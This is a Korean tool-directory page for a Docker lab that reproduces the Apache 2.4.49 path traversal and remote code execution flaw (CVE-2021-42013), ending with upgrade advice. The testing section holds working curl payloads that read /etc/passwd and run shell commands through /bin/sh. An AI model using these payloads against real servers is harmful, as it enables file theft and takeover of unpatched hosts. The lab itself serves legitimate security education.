Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
apache-cve-2021-42013-lab — Docker 환경에서 Apache HTTP Server 2.4.49(CVE-2021-42013) 취약점을 시연하는 실습. | Kitploit
도구/GitHubGitHub/berraesen/apache-cve-2021-42013-lab
Container SecurityVulnerability AnalysisExploitationWeb Application ExploitationLearning & EducationLabs & Practice
GitHubberraesen/apache-cve-2021-42013-lab

apache-cve-2021-42013-lab

Docker 환경에서 Apache HTTP Server 2.4.49(CVE-2021-42013) 취약점을 시연하는 실습.

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
71개월 전아직 검토되지 않음

Apache HTTP Server 2.4.49 Path Traversal 및 원격 코드 실행 (CVE-2021-42013)

프로젝트 소개

이 프로젝트에서는 Apache HTTP Server 2.4.49 버전에 존재하는 CVE-2021-42013 취약점을 Docker를 사용하여 구축한 실습 환경에서 시연했습니다.

목표는 취약점이 어떻게 발생하는지, 어떻게 작동하는지, 시스템에 미치는 영향을 통제된 환경에서 분석하는 것입니다.

본 연구는 교육 및 실습 목적으로만 준비되었습니다.

사용된 기술

  • Docker
  • Ubuntu 22.04
  • Apache HTTP Server 2.4.49
  • Bash
  • curl

프로젝트 파일 구조

root@kitploit:~
.
├── Dockerfile
├── index.html
└── README.md

요구 사항

프로젝트를 실행하기 전에 다음 항목이 설치되어 있어야 합니다.

  • Docker Desktop
  • Git (선택 사항)

설치

먼저 repository를 컴퓨터에 다운로드합니다.

root@kitploit:~
git clone https://github.com/berraesen/apache-cve-2021-42013-lab.git

폴더로 이동합니다.

root@kitploit:~
cd apache-cve-2021-42013-lab

Docker 이미지를 생성합니다.

root@kitploit:~
docker build -t apache-2.4.49-src .

Container를 시작합니다.

root@kitploit:~
docker run -d -p 8081:80 --name apache-src apache-2.4.49-src

Container 내부로 들어갑니다.

root@kitploit:~
docker exec -it apache-src /bin/bash

Apache 버전을 확인합니다.

root@kitploit:~
/usr/local/apache2/bin/httpd -v

Container에서 나가려면:

root@kitploit:~
exit

Apache 모듈 확인

CGI 모듈이 활성화되어 있는지 다음 명령어로 확인할 수 있습니다.

root@kitploit:~
docker exec -it apache-src /usr/local/apache2/bin/apachectl -M

CGI 모듈 활성화

root@kitploit:~
docker exec -it apache-src sed -i 's/#LoadModule cgid_module/LoadModule cgid_module/g' /usr/local/apache2/conf/httpd.conf

그런 다음 Apache를 다시 시작합니다.

root@kitploit:~
docker exec -it apache-src /usr/local/apache2/bin/apachectl restart

CGI 모듈을 비활성화하려면:

root@kitploit:~
docker exec -it apache-src sed -i 's/LoadModule cgid_module/#LoadModule cgid_module/g' /usr/local/apache2/conf/httpd.conf

그런 다음 다시 restart 합니다.

취약점 테스트

Path Traversal

root@kitploit:~
curl.exe -v --path-as-is "http://localhost:8081/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd"

Remote Code Execution

root@kitploit:~
curl.exe -v --path-as-is "http://localhost:8081/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh" --data "echo; id"

더 많은 시스템 정보를 확인하려면:

root@kitploit:~
curl.exe -s --path-as-is "http://localhost:8081/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh" --data "echo; id; uname -a; whoami" -o -

예상 결과

설치가 완료된 후:

  • Apache 2.4.49가 성공적으로 실행되어야 합니다.
  • CGI 모듈이 활성화되면 취약점이 관찰될 수 있습니다.
  • Path Traversal을 통해 시스템 파일에 접근할 수 있음을 보여줄 수 있습니다.
  • RCE를 통해 서버에서 명령을 실행할 수 있음을 확인할 수 있습니다.

취약점 작동 원리

root@kitploit:~
İstemci (cURL)
      │
      ▼
Apache HTTP Server 2.4.49
      │
      ▼
URL Normalization Hatası
      │
      ▼
Path Traversal
      │
      ├──────────────► CGI Kapalı
      │                     │
      │                     ▼
      │             Dosya erişimi mümkün olabilir
      │
      ▼
CGI Aktif
      │
      ▼
/bin/sh çalıştırılabilir
      │
      ▼
Remote Code Execution (RCE)

RCE 시나리오를 시연하려면 mod_cgi 모듈이 활성화되어 있어야 합니다.

예방 조치

이 취약점을 해결하려면 Apache HTTP Server를 2.4.51 이상의 최신 버전으로 업그레이드하는 것이 좋습니다. 또한 CGI를 사용하지 않는다면 비활성화하고, 필요한 디렉터리에 대해서만 적절한 접근 권한을 정의하는 것이 권장됩니다.

도구 다운로드